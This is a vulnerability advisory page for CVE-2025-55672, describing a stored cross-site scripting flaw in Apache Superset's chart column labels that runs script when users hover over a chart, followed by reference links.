PyPI: apache-superset
CVE-2025-55672
Safety vulnerability ID: SFTY-20250815-18115
Safety legacy ID: pyup.io-78711
Affected versions of the apache‑superset package are vulnerable to Cross‑site Scripting (XSS) due to improper sanitization of chart label inputs. The chart visualization module allows an authenticated user with edit‑chart permissions to inject a malicious payload into a chart’s column label, which is not properly sanitized and executes when the victim hovers over the chart. An attacker with such access can exploit this by crafting a chart label containing script code, triggering execution in other users’ browsers upon hover and potentially leading to session hijacking or arbitrary command execution on behalf of the user.
Overview
Apache Superset's chart visualization has a stored Cross-Site Scripting (XSS) vulnerability
Advisory
Affected versions of the apache‑superset package are vulnerable to Cross‑site Scripting (XSS) due to improper sanitization of chart label inputs. The chart visualization module allows an authenticated user with edit‑chart permissions to inject a malicious payload into a chart’s column label, which is not properly sanitized and executes when the victim hovers over the chart. An attacker with such access can exploit this by crafting a chart label containing script code, triggering execution in other users’ browsers upon hover and potentially leading to session hijacking or arbitrary command execution on behalf of the user.
How to Fix
Mitigation and Workarounds
---
Vulnerable Functions
Functions linked to known vulnerabilities.
References
- https://getsafety.com/vulnerabilities/SFTY-20250815-18115/CVE-2025-55672
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55672
- https://github.com/advisories/GHSA-fj97-2v9x-w5m4
- https://nvd.nist.gov/vuln/detail/CVE-2025-55672
- https://lists.apache.org/thread/rvh7fdjfzxzjhcfwoz7twc2brhvochdj
- http://www.openwall.com/lists/oss-security/2025/08/14/4
- https://github.com/advisories/GHSA-fj97-2v9x-w5m4
Verified by Safety
Our Cybersecurity Intelligence Team reviewed this vulnerability. We combine public data with our own research to find issues not yet reported to public sources.
Learn more